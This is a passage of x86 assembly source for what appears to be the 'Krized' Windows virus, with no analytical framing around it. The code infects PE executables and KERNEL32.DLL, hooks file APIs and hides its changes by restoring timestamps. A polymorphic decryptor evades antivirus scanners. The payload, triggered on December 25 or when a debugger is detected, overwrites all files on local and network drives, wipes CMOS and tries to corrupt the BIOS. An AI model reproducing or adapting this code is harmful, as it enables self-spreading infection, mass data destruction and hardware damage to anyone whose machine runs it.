JZ Restore_Attr
PUSH ESI ; Open the candidate-file.
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH ESI
PUSH ESI
PUSH GENERIC_READ OR GENERIC_WRITE
PUSH EBX
PUSH ixCreateFileA
INT 03h
MOV [EBP+(File_Handle-START)], EAX
INC EAX ; Error?
JZ Restore_Attr
MOV EAX, [EBP+(Global_Handle-START)]
ADD EAX, (Time_Last_Write-Virus_End)
PUSH EAX
PUSH EAX ; Fetch it's time-stamps.
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixGetFileTime
INT 03h
PUSH ESI ; Map whole file.
PUSH ESI
PUSH ESI
PUSH PAGE_READONLY
PUSH ESI ; Standard security.
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixCreateFileMappingA
INT 03h
OR EAX, EAX ; Error?
JZ Restore_Stamp
MOV [EBP+(Map_Handle-START)], EAX
PUSH ESI
PUSH ESI
PUSH ESI
PUSH FILE_MAP_READ
PUSH DWORD PTR [EBP+(Map_Handle-START)]
PUSH ixMapViewOfFile
INT 03h
OR EAX, EAX ; Error?
JZ Close_Mapping
MOV [EBP+(Map_Address-START)], EAX
XCHG EBX, EAX
PUSH ESI
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixGetFileSize
INT 03h
CMP EAX, 4096 ; Avoid too small files.
JB Abort_Checks
CMP [EBX.MZ_Mark], 'ZM' ; It must be an .EXE-file.
JNE Abort_Checks
CMP [EBX.MZ_Reloc_Table], 40h ; External header present?
JB Abort_Checks
ADD EBX, [EBX+3Ch] ; Obtain pointer PE-header.
CMP [EBX.PE_Mark], 'EP' ; PE-header is really there?
JNE Abort_Checks
; Only infect 80386/80486/80586-files.
CMP [EBX.CPU_Type], 14Ch ; 80386 compatibility?
JB Abort_Checks
CMP [EBX.CPU_Type], 14Eh ; 80586 compatibility?
JA Abort_Checks
CMP BYTE PTR [EBP+(Infect_Mode-START)], 0
JZ Check_Our_Mark
; Don't infect non-K32 DLL's.
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
JNZ Abort_Checks
Check_Our_Mark: XCHG EDI, EAX
MOVZX EAX, [EBX.Object_Count]
DEC EAX
PUSH 40
POP ECX
MUL ECX
MOVZX EDX, [EBX.NT_Header_Size]
LEA EDX, [EBX+24+EDX]
ADD EDX, EAX
MOV AL, BYTE PTR [EDX.Section_Flags+3]
AND AL, 11010000b ; Strip all but our own
; flags.
CMP AL, 11010000b ; Already infected? (R/W/S).
JE Abort_Checks
; Calculate physical size after infection.
MOV EAX, [EDX.Section_Physical_Offset]
ADD EAX, [EDX.Section_Physical_Size]
ADD EAX, Virus_Size + Poly_Size
MOV ECX, [EBX.File_Align]
CALL Align_EAX
CMP EAX, EDI ; Host increases in size?
JAE Set_Inf_Size
XCHG EDI, EAX ; Don't resize if not.
Set_Inf_Size: MOV [EBP+(Infected_Size-START)], EAX
INC ESI ; Mark as a valid candidate.
JNS Abort_Checks
DB 0EAh ; Just a lame anti-?
Abort_Checks: PUSH DWORD PTR [EBP+(Map_Address-START)]
PUSH ixUnmapViewOfFile
INT 03h
PUSH DWORD PTR [EBP+(Map_Handle-START)]
PUSH ixCloseHandle
INT 03h
DEC ESI ; Valid host?
JNZ Restore_Stamp
PUSH ESI
PUSH DWORD PTR [EBP+(Infected_Size-START)]
PUSH ESI
PUSH PAGE_READWRITE
PUSH ESI ; Standard security.
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixCreateFileMappingA
INT 03h
OR EAX, EAX
JZ Restore_Stamp
MOV [EBP+(Map_Handle-START)], EAX
PUSH ESI
PUSH ESI
PUSH ESI
PUSH FILE_MAP_WRITE
PUSH DWORD PTR [EBP+(Map_Handle-START)]
PUSH ixMapViewOfFile
INT 03h
MOV [EBP+(Map_Address-START)], EAX
OR EAX, EAX ; Error?
JZ Close_Mapping
XCHG EDI, EAX ; Base of mapped candidate.
MOV EBX, [EDI+3Ch] ; PE-header of our candidate.
ADD EBX, EDI
MOVZX EAX, [EBX.Object_Count] ; Calculate offset of last
DEC EAX ; object-header.
PUSH 40
POP ECX
MUL ECX
; Size of formatted header.
MOVZX EDX, [EBX.NT_Header_Size]
LEA EDI, [EBX+24+EDX]
PUSH EDI ; Start object-headers.
ADD EDI, EAX ; Last object-header.
MOV EAX, [EDI.Section_Physical_Size]
PUSH EAX
ADD EAX, Virus_Size + Poly_Size
MOV ECX, [EBX.File_Align]
CALL Align_EAX
MOV ESI, EAX
XCHG [EDI.Section_Physical_Size], EAX
ADD EAX, [EDI.Section_RVA]
PUSH EAX
MOV EAX, [EDI.Section_Virtual_Size]
ADD EAX, (Virus_Size + Poly_Size) - 1
MOV ECX, [EBX.Object_Align]
Calc_Virt_Size: INC EAX
CALL Align_EAX
CMP EAX, ESI
JB Calc_Virt_Size
MOV [EDI.Section_Virtual_Size], EAX
ADD EAX, [EDI.Section_RVA]
MOV [EBX.Image_Size], EAX
POP EAX
POP ECX
ADD ECX, [EDI.Section_Physical_Offset]
ADD ECX, [EBP+(Map_Address-START)]
MOV EDX, EAX
XCHG [EBX.EIP_RVA], EAX
CALL Poly_Engine ; Lame poly-layer.
POP EDX
; Krized used to add a new section to the host, but unfortunately most NT
; files (including K32) don't have room for an extra object-header, this
; more or less forced me to use the append-to-the-last-section-method,
; which could technically cause instabilities.
; Readable/writeable/shareable.
OR BYTE PTR [EDI.Section_Flags+3], 11010000b
XOR ECX, ECX
; We're infecting KERNEL32.DLL ?
CMP [EBP+(Infect_Mode-START)], CL
JNZ Init_Succesful
; Screw K32's build-time to force the loader
; to patch executable's bound imports with our
; hooked API-addresses in K32's export-table,
; instead of using hardcoded addresses.
INC [EBX.PE_Date_Time]
; Notify DLL of PROCESS_ATTACH, this is always
; done regardless of these flags, but I rather
; waste some bytes playing safe.
OR BYTE PTR [EBX.DLL_Flags], 00000001b
; Now change the exports of K32 to point
; to the virus' own handlers.
LEA ESI, [EBP+(Hook_Exports-START)]
CLD
Hook_Export: LODSD ; Get array entry in export.
XCHG EDI, EAX
; Convert the RVA to a physical address.
Find_RVA: MOV EAX, [EDX.Section_RVA]
ADD EAX, [EDX.Section_Virtual_Size]
CMP EDI, EAX ; RVA is in section's space?
JB Calculate_Phys
ADD EDX, 40 ; Next section.
JMP Find_RVA
Calculate_Phys: SUB EDI, [EDX.Section_RVA]
ADD EDI, [EDX.Section_Physical_Offset]
MOVZX EAX, WORD PTR [EBP+(Dispatch_API-START)+(ECX*2)]
ADD EAX, 12345678h
New_Virus_RVA = DWORD PTR $-4
ADD EDI, [EBP+(Map_Address-START)]
STOSD
Cont_Hook_Loop: INC ECX
CMP CL, Hook_API_Count ; Did 'em all?
JB Hook_Export
MOV ESI, [EBP+(Global_Handle-START)]
; Attemp to register a file-update to replace the
; original KERNEL32.DLL with the infected one at
; the next boot-up.
PUSH MOVEFILE_DELAY_UNTIL_REBOOT OR MOVEFILE_REPLACE_EXISTING
LEA EAX, [ESI+(Clean_K32_Path-Virus_End)]
PUSH EAX
LEA EAX, [ESI+(Infected_K32_Path-Virus_End)]
PUSH EAX
PUSH ixMoveFileExA
INT 03h
OR EAX, EAX ; Successful?
JNZ Init_Succesful
PUSH ixGetLastError ; Get extended error-
INT 03h ; information.
; Access denied or function not available?
CMP EAX, ERROR_ACCESS_DENIED
JE Unmap_View
; Else do it the Win9x-way...
CALL @2
DB 'WININIT.INI', 0
@2: LEA EAX, [ESI+(Infected_K32_Path-Virus_End)]
PUSH EAX
LEA EAX, [ESI+(Clean_K32_Path-Virus_End)]
PUSH EAX
CALL @3
DB 'rename', 0
@3: PUSH ixWritePrivateProfileStringA
INT 03h
XCHG ECX, EAX ; Fuck, user doesn't seem
JECXZ Unmap_View ; to have admin-priviliges.
Init_Succesful: XOR EDX, EDX
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Free_Global_M-Clear_Tracks_Sw) - 1
CMP [EBP+(Infect_Mode-START)], DL
JNZ Test_Checksum
MOV BYTE PTR [EBP+(Clear_Tracks_Sw-START)], (Reboot_Test-Clear_Tracks_Sw) - 1
Test_Checksum: CMP [EBX.PE_Checksum], EDX ; This file is checksummed?
JZ Unmap_View
; Check out CheckSumMappedFile and notice how it uses an
; entirely different algorithm, as usual, weird stuph..
MOV [EBX.PE_Checksum], EDX
MOV ESI, [EBP+(Map_Address-START)]
MOV ECX, 12345678h
Infected_Size = DWORD PTR $-4
SHR ECX, 1 ; Words.
Checksum_Loop: MOVZX EAX, WORD PTR [ESI]
ADD EDX, EAX
MOV EAX, EDX
AND EDX, 0FFFFh ; Convert to 16-bit word.
SHR EAX, 16
ADD EDX, EAX
INC ESI
INC ESI
LOOP Checksum_Loop
MOV EAX, EDX
SHR EAX, 16
ADD AX, DX
ADD EAX, [EBP+(Infected_Size-START)]
MOV [EBX.PE_Checksum], EAX
Unmap_View: PUSH 12345678h
Map_Address = DWORD PTR $-4
PUSH ixUnmapViewOfFile
INT 03h
Close_Mapping: PUSH 12345678h
Map_Handle = DWORD PTR $-4
PUSH ixCloseHandle
INT 03h
Restore_Stamp: POP EAX ; Restore file's original
; time-stamps.
PUSH EAX
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
PUSH ixSetFileTime
INT 03h
Close_File: PUSH 12345678h ; And finally close the file.
File_Handle = DWORD PTR $-4
PUSH ixCloseHandle
INT 03h
; Restore the file's original attributes.
Restore_Attr: CMP BYTE PTR [EBP+(Clear_Tracks_Sw-START)], 0
JNZ Set_Attributes
; Trash-copy must be deletable.
AND BYTE PTR [ESP+(1*4)], NOT 00000001b
Set_Attributes: PUSH ixSetFileAttributesA
INT 03h
; If something went wrong while in the process of infecting
; an KERNEL32.DLL-copy, clean up our trash by deleting it.
Clear_Tracks: JMP $
Clear_Tracks_Sw = BYTE PTR $-1
PUSH 12345678h ; Delete KRIZED.TT6 in the
Offset_Inf_K32 = DWORD PTR $-4 ; system-directory.
PUSH ixDeleteFileA
INT 03h
JMP Free_Global_M
; Here we initialize the virus to reboot the system if it has been
; running for over approximately 3 days. Server-systems often run
; for years constantly, and our virus can't become resident until
; the next system-boot, hence this routine.
Reboot_Test: PUSH ixGetTickCount ; Retrieve tickcount since
INT 03h ; Windoze was started.
OR EAX, EAX ; Less than approximately
JNS Free_Global_M ; 3 days?
CALL @4 ; Load USER32.DLL as we need
DB 'USER32', 0 ; one of it's functions.
@4: PUSH ixLoadLibraryA
INT 03h
CALL @5 ; Retrieve API-address.
DB 'ExitWindowsEx', 0
@5: PUSH EAX
PUSH ixGetProcAddress
INT 03h
; Store the address for later use.
MOV [EBP+(ExitWindowsEx-START)], EAX
Free_Global_M: PUSH 12345678h ; Free our global allocated
Global_Handle = DWORD PTR $-4 ; memory.
PUSH ixGlobalFree
INT 03h
Rest_Inf_SEH: XOR EAX, EAX ; Unhook our SEH.
POP DWORD PTR FS:[EAX]
POP EBX
POPAD ; Restore reggies..
RET ; And we're done.
; Some humble poly-engine, it builds decryptors with random registers
; peppered with some simple junk. It won't keep-out the average AV,
; but it's effective enough against public-domain AV-scanners based on
; pure signature-scanning.
; So get me an official opcode list and I'll throw out the lame table-
; driven polymorphics :P
Poly_Engine:
PUSHAD
PUSH EAX
Gen_Decryptor: MOV EDI, [ESP+(7*4)] ; ECX on entry.
PUSH 13 ; Pick a DWORD stacker.
POP EAX
CALL Get_Random
MOV AL, [EBP+(PUSH_Reg32-START)+EAX]
STOSB
MOV AL, 9Ch ; PUSHFD
STOSB
MOV AL, 60h ; PUSHAD
STOSB
CALL Add_Garbage
MOV AL, 0E8h ; CALL
STOSB
MOV AL, 10
CALL Get_Random
INC EAX
STOSD
MOV ESI, EDI
XCHG ECX, EAX
Add_Random: MOV EAX, ESP
CALL Get_Random
STOSB
LOOP Add_Random
PUSH 7
POP EAX
CALL Get_Random
XCHG EBX, EAX
MOV AL, [EBP+(POP_Reg32-START)+EBX]
STOSB
CALL Get_Free_Reg
XCHG EDX, EAX
CALL Add_Garbage
MOV AL, [EBP+(MOV_Reg32-START)+EDX] ; MOV Cntr_Reg
STOSB
MOV AX, Virus_Size
STOSD
CALL Add_Garbage
MOV [EBP+(Decrypt_Loop-START)], EDI
CALL Add_Garbage
MOV AL, 0FFh
CALL Get_Random
JP Construct_XOR ; 1/2 chance of including DS:
MOV AL, 3Eh ; DS:
STOSB
Construct_XOR: MOV AL, 80h
STOSB
MOV AL, [EBP+(XOR_Ptr_Reg32-START)+EBX]
STOSB
MOV [EBP+(Patch_Delta-START)], EDI
MOV AX, Virus_Size-1
STOSD
Get_Random_Key: CALL Get_Random
OR AL, AL
JZ Get_Random_Key
STOSB
PUSH EAX
CALL Add_Garbage
MOV AL, [EBP+(DEC_Reg32-START)+EBX]
STOSB
CALL Add_Garbage
MOV AL, [EBP+(DEC_Reg32-START)+EDX]
STOSB
MOV AL, 75h ; JNZ
STOSB
MOV EAX, EDI
SUB EAX, 12345678h
Decrypt_Loop = DWORD PTR $-4
NOT EAX
STOSB
POP EDX
MOV EAX, EDI
SUB EAX, ESI
ADD DS:[12345678h], EAX
Patch_Delta = DWORD PTR $-4
MOV EAX, EDI ; Calculate size decryptor.
SUB EAX, [ESP+(7*4)]
CMP EAX, 140 ; Too large? Start over then.
JNB Gen_Decryptor
CMP AL, 120 ; Too small? Ditto.
JB Gen_Decryptor
PUSH EDI
MOV ESI, EBP
MOV CX, Virus_Size
REP MOVSB
ADD EAX, [ESP+(7*4)] ; EDX at entry.
MOV [EBP+(New_Virus_RVA-START)], EAX
MOV [EDI+(Virus_RVA-START)-Virus_Size], EAX
POP EAX
SUB EAX, [EBP+(Patch_Delta-START)]
SUB EAX, 4
NEG EAX
MOV [EDI+(Patch_Decrypt-START)-Virus_Size], EAX
MOV [EDI+(Busy_Switch-START)-Virus_Size], CL
MOV WORD PTR [EDI+(Unicode_Switch-START)-Virus_Size], 90ACh
MOV [EDI+(Delay_Timer-START)-Virus_Size], CL
MOV BYTE PTR [EDI+(Init_Mode-START)-Virus_Size], (CALL_Setup_SEH-Init_Mode) - 1
CMP [EBP+(Infect_Mode-START)], CL
JNZ POP_New_EIP
MOV [EDI+(Init_Mode-START)-Virus_Size], CL
POP_New_EIP: POP DWORD PTR [EDI+(Host_EIP-START)-Virus_Size]
MOV ECX, Virus_Size
Encrypt_Virus: DEC EDI
XOR [EDI], DL
LOOP Encrypt_Virus
POPAD
RET
Add_Garbage:
PUSH 8
POP EAX
CALL Get_Random
INC EAX
XCHG ECX, EAX
Add_Junk: PUSH ECX
PUSH 5
POP EAX
CALL Get_Random
JZ End_Junk_Loop
DEC EAX
JZ Junk_ADD_Reg32
DEC EAX
JZ Junk_DEC_Reg32
Junk_MOV_Reg32: CALL Get_Free_Reg
MOV AL, [EBP+(MOV_Reg32-START)+EAX]
STOSB
MOV EAX, ESP
CALL Get_Random
STOSD
JMP End_Junk_Loop
Junk_DEC_Reg32: CALL Get_Free_Reg
MOV AL, [EBP+(DEC_Reg32-START)+EAX]
STOSB
JMP End_Junk_Loop
Junk_ADD_Reg32: MOV AL, 81h
STOSB
CALL Get_Free_Reg
MOV AL, [EBP+(ADD_Reg32-START)+EAX]
STOSB
MOV EAX, ESP
CALL Get_Random
STOSD
End_Junk_Loop: POP ECX
LOOP Add_Junk
XOR EAX, EAX
RET
Get_Free_Reg:
PUSH 7
POP EAX
CALL Get_Random
CMP EAX, EBX
JE Get_Free_Reg
CMP EAX, EDX
JE Get_Free_Reg
RET
Align_EAX:
XOR EDX, EDX
DIV ECX
OR EDX, EDX
JZ Calc_Aligned
INC EAX
Calc_Aligned: MUL ECX
RET
Get_Delta:
CALL Get_EIP
Get_EIP: POP EBP
SUB EBP, (Get_EIP-START)
RET
Hook_CopyFileA:
MOV AL, ixCopyFileA
JMP Main_Dispatch
Hook_CreateFileA:
MOV AL, ixCreateFileA
JMP Main_Dispatch
Hook_CreateProcessA:
MOV AL, ixCreateProcessA
JMP Main_Dispatch
Hook_DeleteFileA:
MOV AL, ixDeleteFileA
JMP Main_Dispatch
Hook_GetFileAttributesA:
MOV AL, ixGetFileAttributesA
JMP Main_Dispatch
Hook_MoveFileA:
MOV AL, ixMoveFileA
JMP Main_Dispatch
Hook_MoveFileExA:
MOV AL, ixMoveFileExA
JMP Main_Dispatch
Hook_SetFileAttributesA:
MOV AL, ixSetFileAttributesA
JMP Main_Dispatch
Hook_CopyFileW:
MOV AL, ixCopyFileW
JMP Main_Dispatch
Hook_CreateFileW:
MOV AL, ixCreateFileW
JMP Main_Dispatch
Hook_CreateProcessW:
MOV AL, ixCreateProcessW
JMP Main_Dispatch
Hook_DeleteFileW:
MOV AL, ixDeleteFileW
JMP Main_Dispatch
Hook_GetFileAttributesW:
MOV AL, ixGetFileAttributesW
JMP Main_Dispatch
Hook_MoveFileW:
MOV AL, ixMoveFileW
JMP Main_Dispatch
Hook_MoveFileExW:
MOV AL, ixMoveFileExW
JMP Main_Dispatch
Hook_SetFileAttributesW:
MOV AL, ixSetFileAttributesW
Main_Dispatch: PUSH ESI
PUSH EBP
AND EAX, 000000FFh
CALL Get_Delta
JMP $
Busy_Switch = BYTE PTR $-1
; Set busy-flag to prevent re-entrancy.
MOV BYTE PTR [EBP+(Busy_Switch-START)], (Do_Old_Handler-Busy_Switch) - 1
; LODSB / NOP
MOV WORD PTR [EBP+(Unicode_Switch-START)], 90ACh
CMP AL, 08 ; Unicode function?
JB Do_Infect
; LODSW
MOV WORD PTR [EBP+(Unicode_Switch-START)], 0AD66h
Do_Infect: MOV ESI, [ESP+(3*4)] ; Infect the sucker.
CALL Infect_File
; Clear busy-flag.
MOV [EBP+(Busy_Switch-START)], AH
Do_Old_Handler: MOV EAX, [EBP+(API_Addresses-START)+(EAX*4)]
SUB EBP, [EBP+(Virus_RVA-START)]
ADD EAX, EBP
POP EBP
POP ESI
JMP EAX ; JMP to the original API.
Perform_API:
PUSH 0
Work_API_Index = BYTE PTR $-1
POP EAX
CMP [EBP+(Init_Mode-START)], AH
MOV EAX, [EBP+(API_Addresses-START)+(EAX*4)]
JZ Calc_K32_Base
Use_Init_Base: ADD EAX, 12345678h
K32_Base = DWORD PTR $-4
JMP EAX
Calc_K32_Base: ADD EAX, EBP
SUB EAX, [EBP+(Virus_RVA-START)]
JMP EAX
; ESI = ASCIIZ / returns AX = CRC16.
Calculate_CRC16:
PUSH EDX
PUSH ESI
PUSH 0FFFFFFFFh
POP EDX
CLD
Load_Character: LODSB
OR AL, AL
JZ Exit_Calc_CRC
XOR DL, AL
MOV AL, 8
CRC_Byte: SHR EDX, 1
JNC Loop_CRC_Byte
XOR EDX, 0EDB88320h
Loop_CRC_Byte: DEC AL
JNZ CRC_Byte
JMP Load_Character
Exit_Calc_CRC: XCHG EDX, EAX
POP ESI
POP EDX
RET
; Activates the payload if the current date is
; December 25th or when Soft-Ice is detected.
Check_For_Payload:
PUSHAD
; Try to detect the presence of Soft-Ice
; version 3.xx & 4.xx (9x/NT).
XOR EBX, EBX
PUSH EBX ; Soft-Ice's 9x driver is
PUSH EBX ; present?
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH EBX
CALL @6
DB '\\.\SICE', 0
@6: PUSH ixCreateFileA
INT 03h
INC EAX ; Immediate retaliation!
JNZ Payload
PUSH EBX ; Soft-Ice's NT driver is
PUSH EBX ; present?
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH EBX
CALL @7
DB '\\.\NTICE', 0
@7: PUSH ixCreateFileA
INT 03h
INC EAX ; Immediate retaliation!
JNZ Payload
MOV ESI, (Local_Time-Virus_End)
ADD ESI, [EBP+(Global_Handle-START)]
PUSH ESI
PUSH ixGetLocalTime
INT 03h
CMP BYTE PTR [ESI.Current_Month], 12
JNE Exit_Check_PL
CMP BYTE PTR [ESI.Current_Day], 25
JNE Exit_Check_PL
; Most likely we aren't yet connected to the network so it's
; better to wait some time before we start destroying.
INC BYTE PTR [EBP+(Delay_Timer-START)]
JZ Payload
Exit_Check_PL: POPAD
RET
Delay_Timer DB 0
; Let's get ready to r0ck..
Payload:
CALL Setup_Nuke_SEH
CALL Get_Delta
XOR EBX, EBX
MOV ESP, [ESP+(2*4)]
JMP Rest_Nuke_SEH
Setup_Nuke_SEH: PUSH DWORD PTR FS:[EBX]
MOV FS:[EBX], ESP
PUSH EAX ; Obtain IDT.
SIDT [ESP-2]
POP EAX
; Our ring-0 INT exception-handler.
LEA ECX, [EBP+(Ring0_Handler-START)]
XCHG [EAX+(3*8)], CX ; Set our own ring-0 handler.
ROR ECX, 16
XCHG [EAX+(3*8)+6], CX
INT 03h ; Raise ring-0 exception.
MOV [EAX+(3*8)+6], CX ; Restore original handler.
ROR ECX, 16
MOV [EAX+(3*8)], CX
Rest_Nuke_SEH: POP DWORD PTR FS:[EBX] ; Restore original SEH.
POP EAX
MOV EDI, [EBP+(Global_Handle-START)] ; Kill-list.
PUSH EDI
CALL @8 ; Load network-library.
DB 'MPR', 0
@8: PUSH ixLoadLibraryA
INT 03h
XCHG ECX, EAX ; Error?
JECXZ JECXZ_Enum_L
MOV EBX, ECX ; Save base in EBX.
CALL @9
DB 'WNetOpenEnumA', 0
@9: PUSH EBX
PUSH ixGetProcAddress
INT 03h
XCHG ECX, EAX
JECXZ Enum_Locals
MOV [EBP+(WNetOpenEnumA-START)], ECX
CALL @10
DB 'WNetEnumResourceA', 0
@10: PUSH EBX
PUSH ixGetProcAddress
INT 03h
XCHG ECX, EAX
JECXZ_Enum_L: JECXZ Enum_Locals
MOV [EBP+(WNetEnumResourceA-START)], ECX
CALL @11 ; Retrieve a find handle
Enum_Handle DD 0 ; to the system root.
@11: PUSH 0
PUSH 0
PUSH RESOURCETYPE_DISK
PUSH RESOURCE_CONNECTED
CALL [EBP+(WNetOpenEnumA-START)]
OR EAX, EAX
JNZ Enum_Locals
; Enumerate all active network-connections.
Retrieve_Enum: LEA ESI, [EBP+(Net_Resource-START)]
CALL @12
Buffer_Size DD 666
@12: PUSH ESI
CALL @13
Enum_Count DD 1
@13: PUSH DWORD PTR [EBP+(Enum_Handle-START)]
CALL [EBP+(WNetEnumResourceA-START)]
OR EAX, EAX
JNZ Enum_Locals
MOV ESI, [ESI+(5*4)] ; Found remote name.
CLD
Copy_Target: LODSB ; Copy the remote name to
STOSB ; our kill-list.
OR AL, AL ; Did the entire ASCIIZ ?
JNZ Copy_Target
JMP Retrieve_Enum
Enum_Locals: POP ESI ; Array of network-drives.
PUSH EDI ; Append local drives.
PUSH 256
PUSH ixGetLogicalDriveStringsA
INT 03h
Drive_Loop: PUSH ESI ; What kind of disk is this?
PUSH ixGetDriveTypeA
INT 03h
CMP AL, DRIVE_REMOVABLE ; Skip floppy-drives.
JE Find_Next_Str
CMP AL, DRIVE_CDROM ; Skip CD-ROM's.
JE Find_Next_Str
CMP AL, DRIVE_RAMDISK ; Skip RAM-disks.
JE Find_Next_Str
CALL_Trash_Dir: CALL Trash_Directory ; Trash the root including
; all it's sub-directories.
Find_Next_Str: CLD ; Fetch next byte.
LODSB
OR AL, AL ; Found the end of ASCIIZ ?
JNZ Find_Next_Str
CMP [ESI], AL
JNZ Drive_Loop ; Thank you DRIVE through :P
JMP $ ; Heart stops..
;-----------------------------------
; Overwrites all bytes in all files
; in all directories on all drives.
;-----------------------------------
Trash_Directory:
PUSHAD
SUB ESP, (318+260+2) ; Reserve space on the stack,
; note that ESP must always
; point to a DWORD boundary.
LEA EAX, [ESP+318] ; Save our current directory.
PUSH EAX
PUSH 260
PUSH ixGetCurrentDirectoryA
INT 03h
CMP EAX, 260 ; Too big for our buffer?
JA JNZ_Exit_Trash
XCHG ECX, EAX ; Or the function failed?
JECXZ JNZ_Exit_Trash
PUSH ESI ; Change to found directory.
PUSH ixSetCurrentDirectoryA
INT 03h
DEC EAX ; Argh! something went wrong!
JNZ_Exit_Trash: JNZ Exit_Trash_Dir
XCHG EBX, EAX ; EBX = 0.
PUSH ESP ; Find us a victim.
CALL @14
DB '*.*', 0 ; Kill 'em all!
@14: PUSH ixFindFirstFileA
INT 03h
MOV EDI, EAX
INC EAX
JZ Close_Find
Destroy_Loop: LEA ESI, [ESP.FFN_File_Name]
; Is it a directory?
TEST BYTE PTR [ESP.File_Attributes], 00010000b
JZ Trash_File
CMP WORD PTR [ESI], '.' ; Fuck for '.'...
JE Find_Next_Crap
CMP WORD PTR [ESI], '..' ; Or '..'.
JNE Do_Trash_Dir
CMP [ESI+2], BL ; /0.
JZ Find_Next_Crap
Do_Trash_Dir: CALL Trash_Directory
JMP Find_Next_Crap
Trash_File: PUSH FILE_ATTRIBUTE_NORMAL ; Clear all it's attributes.
PUSH ESI
PUSH ixSetFileAttributesA
INT 03h
XCHG ECX, EAX
JECXZ Find_Next_Crap
PUSH EBX ; Open the target.
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
PUSH ESI
PUSH ixCreateFileA
INT 03h
MOV ESI, EAX
INC EAX
JZ Find_Next_Crap
PUSH EBX ; Get it's filesize.
PUSH ESI
PUSH ixGetFileSize
INT 03h
; K, time to say ur prares..
PUSH EBX ; Nuke the S.O.B.
CALL @15
DD 0DEADBEEFh
@15: PUSH EAX
PUSH 444444h
PUSH ESI
PUSH ixWriteFile
INT 03h
; Wasted, time to seal the tomb..
PUSH ESI
PUSH ixCloseHandle
INT 03h
Find_Next_Crap: PUSH ESP
PUSH EDI
PUSH ixFindNextFileA
INT 03h
DEC EAX
JZ Destroy_Loop
Close_Find: PUSH EDI ; Close filehandle.
PUSH ixFindClose
INT 03h
LEA EAX, [ESP+318] ; Restore original directory.
PUSH EAX
PUSH ixSetCurrentDirectoryA
INT 03h
Exit_Trash_Dir: ADD ESP, (318+260+2) ; Clean-up our stackspace.
POPAD
RET
;-------------------------------------------------------
; Overwrite CMOS and attempt to flash the BIOS chipset.
;-------------------------------------------------------
Ring0_Handler:
PUSHFD
PUSHAD
CLI
MOV CL, 64 ; Take all 64 bytes of CMOS.
Nuke_CMOS_Byte: DEC CL ; We've did 'em all?
JS Nuke_BIOS
MOV AL, CL ; Request I/O to byte CL.
OUT 70h, AL
XOR AL, AL ; Trash the byte.
OUT 71h, AL
JMP Nuke_CMOS_Byte ; Repeat until all is done.
; The CIH BIOS-flasher should work on every Intel-board
; out there, which are becoming increasingly common.
; I have fully commented Pascal sources of how to flash
; Intel and other boards, available on request.
Nuke_BIOS: ; Show BIOS Page in 000E0000 - 000EFFFF (64k).
MOV EDI, 8000384Ch
MOV BP, 0CF8h
MOV DX, 0CFEh
CALL IOForEEPROM
; Show BIOS Page in 000F0000 - 000FFFFF (64k).
MOV DI, 0058h
DEC EDX
MOV WORD PTR [EBP+(Switch-START)], 0F24h ; AND AL, 0Fh
CALL IOForEEPROM
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
MOV EAX, 0E5555h
MOV ECX, 0E2AAAh
CALL EnableEEPROMToWrite
MOV BYTE PTR [EAX], 60h
PUSH ECX
LOOP $
; Destroy BIOS Extra ROM Data in 000E0000h - 000E007Fh, (80h bytes).
XOR AH, AH
MOV WORD PTR [EAX], 'RI' ; Dare yew go TU :P
XCHG ECX, EAX
LOOP $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
MOV EAX, 0F5555h
POP ECX
MOV CH, 0AAh
CALL EnableEEPROMToWrite
MOV BYTE PTR [EAX], 20h
LOOP $
; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes).
MOV AH, 0E0h
MOV [EAX], AL
; Hide BIOS Page in 000F0000 - 000FFFFF (64k).
MOV WORD PTR [EBP+(Switch-START)], 100Ch ; or al,10h
CALL IOForEEPROM
POPAD
POPFD
IRETD
; Enable EEPROM to Write.
EnableEEPROMToWrite:
MOV [EAX], CL
MOV [ECX], AL
MOV BYTE PTR [EAX], 80h
MOV [EAX], CL
MOV [ECX], AL
RET
; I/O for EEPROM.
IOForEEPROM:
XCHG EDI, EAX
XCHG EDX, EBP
OUT DX, EAX
XCHG EDI, EAX
XCHG EDX, EBP
IN AL, DX
OR AL, 44h
Switch = WORD PTR $-2
XCHG EDI, EAX
XCHG EDX, EBP
OUT DX, EAX
XCHG EDI, EAX
XCHG EDX, EBP
OUT DX, AL
RET
; Returns random number between 0 and EAX-1.
Get_Random:
PUSHAD
XCHG EBX, EAX
PUSH ixGetTickCount
INT 03h
RCL EAX, 2
ADD EAX, 12345678h
Random_Seed = DWORD PTR $-4
ADC EAX, ESP
XOR EAX, ECX
XOR [EBP+(Random_Seed-START)], EAX
ADD EAX, [ESP-(13*4)]
RCL EAX, 1
XOR EDX, EDX
DIV EBX
ADD [EBP+(Random_Seed-START)], EDX
MOV [ESP+(7*4)], EDX
POPAD
OR EAX, EAX
RET
KERNEL32_Name DB '\KERNEL32.DLL', 0
Infected_K32 DB '\KRIZED.TT6', 0
API_Addresses: DD (Work_API_Count + Hook_API_Count) DUP(0)
Hook_Exports: DD Hook_API_Count DUP(0)
; EAX EBX ECX EDX ESI EDI EBP
ADD_Reg32: DB 0C0h, 0C3h, 0C1h, 0C2h, 0C6h, 0C7h, 0C5h
POP_Reg32: DB 058h, 05Bh, 059h, 05Ah, 05Eh, 05Fh, 05Dh
DEC_Reg32: DB 048h, 04Bh, 049h, 04Ah, 04Eh, 04Fh, 04Dh
